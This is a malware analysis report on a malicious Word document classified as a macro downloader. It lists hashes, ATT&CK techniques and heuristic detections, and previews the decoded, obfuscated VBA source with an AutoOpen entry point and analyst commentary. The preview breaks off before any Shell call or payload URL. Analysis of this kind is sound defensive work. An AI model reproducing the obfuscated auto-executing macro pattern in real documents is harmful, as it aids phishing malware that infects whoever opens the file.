Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c1911444c109ebe…

MALICIOUS

Office (OLE)

188.5 KB Created: 2018-09-25 15:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 13644af1415a6093221b2d0c101e6a53 SHA-1: 48a2c86129ed8292624cc700b98b36984f8016c9 SHA-256: 7c1911444c109ebedde7d57174142baab688364a8607dd49ccf44d8dd005cc6b
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro contains a Shell() call; taken together with the ClamAV Doc.Downloader signature, this indicates it likely downloads and executes a second-stage payload. The ClamAV detection corroborates the classification of this sample as a malicious downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.00536d-6697333-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6697333-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (On this particular sample a VBA project was in fact recovered — see the "VBA macros detected" finding and the extracted macros.bas below — so treat this finding's generic wording as an overlapping signal rather than independent evidence.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The single URL listed here, http://schemas.openxmlformats.org/drawingml/2006/main, is the standard Office Open XML DrawingML namespace identifier that appears in document structure; it is not a network indicator of compromise.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 205428 bytes
SHA-256: d058068422154b6582806e9a67fff44870e0d8b68519bc5fe4259b5e58713cf0
Preview script
First 1,000 lines of the extracted script
' Module header as exported by olevba. VB_Name is the module's (meaningless-looking)
' name "UhjoXOF"; VB_Base = "1Normal.ThisDocument" names the document's ThisDocument
' object, and VB_PredeclaredId/VB_Exposed are set. Attribute lines are metadata only;
' nothing in this header executes by itself.
Attribute VB_Name = "UhjoXOF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word runs AutoOpen when the document is opened
' (the OLE_VBA_AUTOOPEN heuristic above). Analyst reading: every statement in
' this procedure except the single call near the end looks like obfuscation
' padding -- see the per-line notes below.
Sub AutoOpen()
   ' Each Dim/assign pair fills an array from Mid/MidB/Left/Right slices of
   ' concatenated identifiers that are not declared anywhere in the visible
   ' listing, and the array is never read again in this procedure. The highest
   ' index of each array is never assigned at all (e.g. Dim smGCMJ(1) only gets
   ' smGCMJ(0)).
   Dim smGCMJ(1)
smGCMJ(0) = MidB(CbiYj + rHQdCjPCCiPOGDrNLUN + TLwpvFdK, 355, 259) + MidB(iEaCcU + htNuiFfhOMdFaJaWzZTzB + nwRKj, 988, 177)
   Dim uXscc(2)
uXscc(0) = Mid(orPMKHp + kJlRAKmPKmlJzItBN + ZAdqw, 208, 238) + MidB(kUNODTS + MGMSqpjGNCNntTkoKUzZw + QtBGf, 806, 398) + MidB(lpHKo + EzQVzbjTiiPHMjoYmazhMt + iscaAAwv, 507, 616) + Right(pAUmz + RnEZPQWvFSEjKorHiO + Gkmkim, 114)
uXscc(1) = MidB(AnwEdTM + iDqIbcUpjvphVwodk + priEpni, 638, 411) + Right(tjGbw + QcwZRSwoifiiTOwZXnjcI + mnHCuz, 616)
   Dim EnPao(1)
EnPao(0) = MidB(zvBrvjqp + YlVjAoOHfoloNzzGwYkm + jGTVDwR, 196, 323) + Left(zkEzBZhF + GVthjstFowaCTfDiWbXED + tHwwCj, 810) + Left(lanUDi + mvYhlGtiXhlpTUzbw + SkjtvTs, 684) + MidB(LMSHqhHo + YIIhqlTzDHTdnwrW + uttaW, 975, 658)
   Dim lOtjNd(1)
lOtjNd(0) = Left(waSYfCbw + XAuozSrwwNnhSWNZS + DIDUi, 795) + MidB(GmPEam + OMOViIlKBMMjOWDtlkiCdEiq + dqabZw, 254, 82)
   Dim LSYZFI(1)
LSYZFI(0) = MidB(JdzBVLjo + tPAjShLbZzkRwMSiPFjZr + wjhBZ, 848, 911) + MidB(BwbAqNdk + ZMzptiOFnNqJcLjWAEoiJLf + sBcvsw, 647, 889) + MidB(nTLmTvbL + oGiiOjokpdOjvNazLuRln + pSVni, 14, 854) + Left(lStjMKw + NZmPZjJNbEXVvrVPqH + iSbHSl, 711)
' The one statement that reaches other code: UbMjpPpiNROz is called with an
' argument assembled from two KeyString(...) results, small numeric literals
' and more undeclared names. Neither UbMjpPpiNROz nor KeyString is defined in
' the visible preview; zRWTfirfpBj (referenced in the argument) is the Function
' declared in the next module of this listing. NOTE(review): the Shell() call
' reported by OLE_VBA_SHELL does not appear in this preview -- presumably it is
' reached through UbMjpPpiNROz; confirm against the full extracted macros.bas.
UbMjpPpiNROz (KeyString(zCGpawo + FJHui + 6 + 8 + 11 + 7 + 35 + wHZNw + cSjQLf) + CTjtkU + dftzRw + KeyString(iuiBC + ikidXtfd + 7 + 9 + 12 + 8 + 41 + lHoKpfhR + iCMFjmch) + zRWTfirfpBj + tucpYU + WwjRb + GiIcQUzJ + VmDUloq + LkJHudcjHi + pLRqzo + adaXwNXOS + YikwNWHVo + LoatjKXB + aPZQsVKAG + thoIjbuR + mWovY + RAHivUuzbO + cZhQZ + DZnQwGP)
   ' More padding of the same shape as above, after the call; these arrays are
   ' likewise never read again.
   Dim zpLzub(2)
zpLzub(0) = Mid(unBTCYlB + zkkdivmjvwAHDnItmj + cHDjoI, 44, 18) + Left(AOuwVHqC + jDuVTLwkHlVXMIVGdhuvER + FRACj, 546) + MidB(ZMhPcKRX + iripAFvdJmHqwtTcE + oVjIwViT, 307, 435) + MidB(mbiPRYzo + ESWdPdwvoHlCrfjRJ + EvRYUd, 38, 77)
zpLzub(1) = Right(uPQRlT + CRaOnYRJZspfoNbL + nwrht, 824) + MidB(pGLcQGcp + QACUcsrFjbIQrPU + tKlVTTj, 722, 117)
   Dim UUoha(2)
UUoha(0) = Mid(DHwzkRX + GWtVtvRmmipFjMARQMQab + IdwrmBK, 811, 847) + MidB(BYYDMu + vwbklAGMOpvRnojuzh + ocpics, 247, 10) + MidB(IsjjsLq + zcCoEUJljzolQjvSoNz + JJoiGv, 402, 76) + Left(hmlolNT + UWwXcztkYihwOjjaiTLwLz + BTJFUGBt, 943)
UUoha(1) = Left(LkNLEfv + YBJqhscJanXuAsTNbwV + JUpRHG, 314) + MidB(zYzKTXbd + WXNRkUvMhdnCPojLWDJX + csFmvlzZ, 725, 299) + MidB(DFwMHDiR + kVmKZRjNzlVpMQvfOQ + lJzPKwFo, 208, 681) + Left(jzlMj + CzKhzXummmziBAbCqk + amBTF, 249)
   Dim zYTuq(2)
zYTuq(0) = MidB(TjpClD + vDMZrHGNGPhAGlWjbir + kwACrrY, 638, 13) + Left(dYjrvt + naZSKjROXsompvG + WhijSl, 42)
zYTuq(1) = Left(fliOl + KdqCIaJKaTomrqzjGstAY + MilKs, 362) + MidB(iRPAIvXX + SNvNjwrPUGQcSOaYwi + wMdYpq, 771, 659) + Left(JFkFww + dQujOpzBjwzbJSBFXBZNll + MSBPbi, 572) + MidB(fRwobso + UsAnzIzSRECIvRWzRVRwEi + DRvJkGA, 322, 66)
End Sub


' Header of the second exported module ("VtSiQMAjXW"). It holds the Function
' zRWTfirfpBj that AutoOpen names inside its call argument; the preview of that
' Function is truncated below, so its full body is not visible here.
Attribute VB_Name = "VtSiQMAjXW"
Function zRWTfirfpBj()
Dim fKLJb(2)
fKLJb(0) = Mid(rGFQDnfY + hBssZWUaEvMCQiXwYidm + YFpvNY, 512, 490) + MidB(NhiGnqAB + fDKbmIbjuEiBRfNNfV + zbjARIh, 648, 537)
fKLJb(1) = Left(jUuOJEQz + twjzFWLnjhrcMzDSwMcqGuj + DIOWus, 78) + Left(ALmWunoJ + iOFwZjuVIdFYAvULzkIWD + jcSoCwD, 775)
   Dim mYwpXs(2)
mYwpXs(0) = Left(UmMXZIi + slojhmOlBaCATvLrUj + IXCFzh, 596) + MidB(OcXGUw + lblquZkLEizmvNjJfjNh + MoIOuw, 935, 120) + Mid(FMjNwRF + AkabjcsoZEXtiWhmRFhrhD + hSLNbcE, 118, 671) + Mid(YlBJHj + LiJfNSTXTttXwWdMcu + ovWDAQ, 920, 492)
mYwpXs(1) = Mid(rbAXnzX + hmpsqspniTYRVjqnR + tiNfVto, 676, 605) + Left(mHlwDj + bIurHEpBDGkrtGiKG + EziEi, 294)
   Dim pvzCW(1)
pvzCW(0) = Right(lpSjj + TzcfQEwluvcLrDSJNl + FnFAz, 141) + MidB(uNBSfE + TqsTYltcawPUQizWs + EqsVA, 314, 847)
   Dim MUjYh(2)
MUjYh(0) = MidB(ELuioTrK + lKdjFUoFkWEUWnAhTVmbX + mXCrXkF, 558, 699) + Left(oHAshb + zrXunpcmPwiGhQoOMmw + bipSjbn, 216) + Right(TlOcO + HTNldYfSbtjAAlTFzz + bnQAw, 806) + MidB(aLHifdAz + mOzuwUSldJJCImwNL + znTBpBVX, 698, 424)
MUjYh(1) = MidB(MhMh
... (truncated)